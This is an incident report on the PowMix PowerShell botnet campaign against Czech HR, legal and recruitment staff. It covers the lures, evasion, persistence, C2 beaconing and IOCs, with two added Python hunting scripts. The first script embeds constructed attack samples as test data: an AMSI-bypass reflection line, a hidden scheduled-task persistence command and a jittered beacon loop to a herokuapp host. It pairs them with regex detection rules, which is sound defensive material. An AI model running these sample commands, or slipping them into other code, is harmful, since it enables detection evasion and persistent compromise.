Full Report
Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.”
Analysis Summary
# Incident Report: PowMix Botnet Campaign Targeting Czech Republic
## Executive Summary
Since at least December 2025, a previously undocumented PowerShell-based botnet dubbed "PowMix" has been targeting the workforce in the Czech Republic. The campaign employs sophisticated evasion techniques, including randomized C2 beaconing and in-memory execution, to deliver malicious payloads to HR, legal, and recruitment professionals. The threat actor leverages compliance-themed lures related to the Czech Data Protection Act to compromise diverse sectors including IT, finance, and logistics.
## Incident Details
- **Discovery Date:** April 16, 2026 (Talos Public Disclosure)
- **Incident Date:** Active since at least December 2025 (Ongoing)
- **Affected Organization:** Broader Czech workforce; impersonation of EDEKA brand
- **Sector:** Cross-sector (HR, Legal, Recruitment, IT, Finance, Logistics)
- **Geography:** Czech Republic
## Timeline of Events
### Initial Access
- **Date/Time:** December 2025 – Present
- **Vector:** Phishing/Social Engineering
- **Details:** Victims receive a ZIP archive containing a malicious Windows Shortcut (.LNK) file. The lures utilize thematic content regarding compensation data and the Czech Data Protection Act to entice users into opening the file.
### Lateral Movement
- **Details:** Specific lateral movement techniques were not detailed in the report, as the focus remained on the initial infection vector and the primary botnet capabilities.
### Data Exfiltration/Impact
- **Details:** The PowMix botnet transmits system metadata (Bot ID, OS info, Computer Name) to the C2. While the final payload was unobserved, the botnet possesses the capability to execute arbitrary PowerShell commands and update C2 infrastructure dynamically.
### Detection & Response
- **Discovery:** Detected by Cisco Talos through telemetry and analysis of localized lure documents.
- **Response Actions:** Release of ClamAV signatures and Snort rules; public disclosure of IOCs to assist defenders.
## Attack Methodology
- **Initial Access:** Phishing via ZIP archives containing malicious .LNK files.
- **Persistence:** Creation of Windows Scheduled Tasks to ensure execution across reboots.
- **Privilege Escalation:** Not explicitly stated; relies on user-level execution for initial foothold.
- **Defense Evasion:** Bypasses AMSI using reflection to manipulate `amsiInitFailed`; uses randomized C2 beaconing intervals; executes payloads directly in memory so that file-based heuristics have no artifact on disk to inspect.
- **Credential Access:** Not specified (potential for follow-on payloads).
- **Discovery:** Collects Bot ID (CRC32 based), computer name, and OS architecture.
- **Lateral Movement:** Not specified.
- **Collection:** Gathers system metadata for C2 registration.
- **Exfiltration:** Heartbeat data and system identifiers embedded into C2 URL paths mimicking REST APIs.
- **Impact:** System compromise, potential for data theft or further malware deployment.
## Impact Assessment
- **Financial:** Unknown; potential for significant loss if used for ransomware or business email compromise.
- **Data Breach:** Metadata and system information leaked; risk of sensitive corporate data theft via arbitrary command execution.
- **Operational:** Disruption through unauthorized persistence and potential for subsequent payload delivery.
- **Reputational:** Impersonation of legitimate brands (EDEKA) and regulatory frameworks may damage trust in compliance-related communications.
## Indicators of Compromise
- **Network Indicators:**
  - `[domain].herokuapp[.]com` (Abused for C2 infrastructure)
  - URLs mimicking REST APIs with embedded encrypted data.
- **File Indicators:**
  - Lnk.Trojan.PowMix-10059735-0
  - Txt.Trojan.PowMix-10059742-0
- **Behavioral Indicators:**
  - PowerShell script executing AMSI bypass via `amsiInitFailed`.
  - Random intervals between network beacons to circumvent signature detection.
  - Persistence established through scheduled-task manipulation (`Unregister-ScheduledTask` observed) and `Set-Content` file writes.
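The behavioral indicators above map naturally onto PowerShell ScriptBlock logging (Event ID 4104). The following is an added example, not code from the Talos report: a small rule engine that scans constructed script-block text for the three behaviors listed (reflection against `amsiInitFailed`, scheduled tasks pointing into `ProgramData`, and jittered web beacons) plus the Heroku-hosted URL shape. The sample blocks, the rule names and the `example-app` host are all constructed for illustration; the AMSI sample is deliberately abbreviated with `...` because only the tokens a detector keys on matter here.

```python
import re

# Constructed sample lines in the shape of PowerShell ScriptBlock log message
# bodies. They are illustrative only and are not indicators from the report.
SAMPLE_SCRIPT_BLOCKS = [
    # benign admin activity, should not fire
    "Get-ChildItem -Path C:\\Users\\alice\\Documents | Measure-Object",
    # reflection against the AMSI utils class touching amsiInitFailed (abbreviated)
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', ...)",
    # task re-registration whose action runs a script staged under ProgramData
    "Unregister-ScheduledTask -TaskName Updater -Confirm:$false; "
    "Register-ScheduledTask -TaskName Updater -Action (New-ScheduledTaskAction "
    "-Execute powershell.exe -Argument '-w hidden -File C:\\ProgramData\\svc\\run.ps1')",
    # beacon loop with a randomized sleep to a REST-looking path on a PaaS host
    "while($true){ Invoke-WebRequest -Uri ('https://example-app.herokuapp.com/api/v1/status/'+$id); "
    "Start-Sleep -Seconds (Get-Random -Minimum 30 -Maximum 300) }",
    # legitimate Get-Random use, should not fire
    "$pick = Get-Random -InputObject @('a','b','c')",
]

# Each rule is a list of regexes that must ALL match the same script block.
# Requiring co-occurrence keeps single common tokens (Get-Random, ProgramData)
# from producing noise on their own.
RULES = {
    "amsi_reflection_tamper": [r"amsiInitFailed|AmsiUtils", r"GetField|SetValue"],
    "scheduled_task_in_programdata": [r"Register-ScheduledTask|schtasks(\.exe)?\s+/create", r"ProgramData"],
    "jittered_web_beacon": [r"Get-Random", r"Start-Sleep", r"Invoke-WebRequest|Invoke-RestMethod|WebClient"],
    "herokuapp_url": [r"https?://[a-z0-9-]+\.herokuapp\.com/"],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in RULES.items()}


def match_rules(block: str) -> list[str]:
    """Return the names of every rule whose regexes all match this script block."""
    return [name for name, pats in COMPILED.items() if all(p.search(block) for p in pats)]


def scan_script_blocks(blocks: list[str]) -> list[tuple[int, str]]:
    """Scan a sequence of script blocks; return (block_index, rule_name) findings in order."""
    findings = []
    for idx, block in enumerate(blocks):
        for name in match_rules(block):
            findings.append((idx, name))
    return findings


if __name__ == "__main__":
    for idx, name in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {idx}: {name}")
```

Run as a script it prints one line per finding; in practice the block list would be fed from the 4104 event stream and the `herokuapp_url` rule should be treated as a hunting lead rather than an alert, since the platform also hosts legitimate applications.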
## Response Actions
- **Containment:** Organizations advised to block identified Heroku-based C2 domains.
- **Eradication:** Deployment of Snort rule SID 66118 to detect PowMix network activity and of ClamAV signatures to identify and remove PowMix components.
- **Recovery:** Restoration of compromised systems; removal of rogue Scheduled Tasks and "ProgramData" staging directories.
## Lessons Learned
- **Thematic Sophistication:** Threat actors are successfully leveraging localized legislation (Czech Data Protection Act) to increase the success rate of social engineering.
- **Infrastructure Abuse:** The continued use of legitimate cloud platforms like Heroku for C2 operations complicates IP-based blocking.
- **Evasion Evolution:** The move from persistent connections to randomized heartbeat intervals effectively bypasses many traditional network security signatures.
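The randomized heartbeat noted above defeats detectors that look for a fixed period, but it does not change the other properties of a beacon: one client repeatedly contacting one rarely seen PaaS host on an unchanging REST-style path. The following is an added example, not part of the Talos report, that profiles constructed proxy log lines and flags beacons on those properties, alongside the fixed-period heuristic it replaces so the gap is visible. The log format, client addresses, `example-app` host and path are all constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed proxy log: "<ISO timestamp> <client_ip> <host> <path>".
# The 10.0.0.7 client beacons with irregular gaps (156s, 36s, 281s, 66s);
# 10.0.0.9 is ordinary browsing. None of these are indicators from the report.
SAMPLE_PROXY_LOG = """\
2026-01-10T08:00:05 10.0.0.7 example-app.herokuapp.com /api/v1/status/3fa9c2d1
2026-01-10T08:02:41 10.0.0.7 example-app.herokuapp.com /api/v1/status/3fa9c2d1
2026-01-10T08:03:17 10.0.0.7 example-app.herokuapp.com /api/v1/status/3fa9c2d1
2026-01-10T08:07:58 10.0.0.7 example-app.herokuapp.com /api/v1/status/3fa9c2d1
2026-01-10T08:09:04 10.0.0.7 example-app.herokuapp.com /api/v1/status/3fa9c2d1
2026-01-10T08:00:30 10.0.0.9 docs.example.org /handbook/leave-policy
2026-01-10T08:15:30 10.0.0.9 docs.example.org /handbook/leave-policy
"""

# Hosting platform named in the report as abused for C2.
PAAS_HOST = re.compile(r"\.herokuapp\.com$", re.I)


def parse_proxy_log(text: str) -> list[tuple[datetime, str, str, str]]:
    """Parse log text into (timestamp, client, host, path); skip blank or malformed lines."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        rows.append((datetime.fromisoformat(parts[0]), parts[1], parts[2], parts[3]))
    return rows


def profile_connections(rows) -> list[dict]:
    """Group hits by (client, host) and summarize count, path diversity and inter-arrival gaps."""
    groups = defaultdict(list)
    for ts, client, host, path in rows:
        groups[(client, host)].append((ts, path))
    profiles = []
    for (client, host), hits in groups.items():
        hits.sort()
        times = [h[0] for h in hits]
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps) if gaps else 0.0
        profiles.append({
            "client": client,
            "host": host,
            "hits": len(hits),
            "distinct_paths": len({h[1] for h in hits}),
            "gap_min": min(gaps) if gaps else 0.0,
            "gap_max": max(gaps) if gaps else 0.0,
            # spread of the gaps relative to their mean; near 0 means a fixed period
            "jitter": (max(gaps) - min(gaps)) / mean if gaps and mean else 0.0,
        })
    return profiles


def flag_beacons(profiles: list[dict], min_hits: int = 4) -> list[dict]:
    """Flag repeated contact to a PaaS host on a single unchanging path, whatever the timing."""
    return [p for p in profiles
            if p["hits"] >= min_hits and p["distinct_paths"] == 1 and PAAS_HOST.search(p["host"])]


def periodic_only(profiles: list[dict], min_hits: int = 4, max_jitter: float = 0.1) -> list[dict]:
    """The fixed-interval heuristic a randomized sleep is designed to slip past."""
    return [p for p in profiles if p["hits"] >= min_hits and p["jitter"] <= max_jitter]


if __name__ == "__main__":
    profs = profile_connections(parse_proxy_log(SAMPLE_PROXY_LOG))
    for p in flag_beacons(profs):
        print(f"{p['client']} -> {p['host']}: {p['hits']} hits, "
              f"gaps {p['gap_min']:.0f}-{p['gap_max']:.0f}s, jitter {p['jitter']:.2f}")
    print("fixed-period heuristic flagged:", len(periodic_only(profs)))
```

The jittered client is flagged by `flag_beacons` and missed by `periodic_only`, which is the point of the lesson. The `min_hits` and host-pattern thresholds are starting values for hunting; baseline them against your own proxy data before turning the rule into an alert.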
## Recommendations
- **Technical:** Implement EDR policies to block PowerShell from loading reflection-based AMSI bypasses and monitor for unusual scheduled task creations in `ProgramData`.
- **Policy:** Restrict the execution of .LNK files from downloaded ZIP archives.
- **Training:** Conduct localized security awareness training focusing on HR and Legal departments regarding document legitimacy and legislative lures.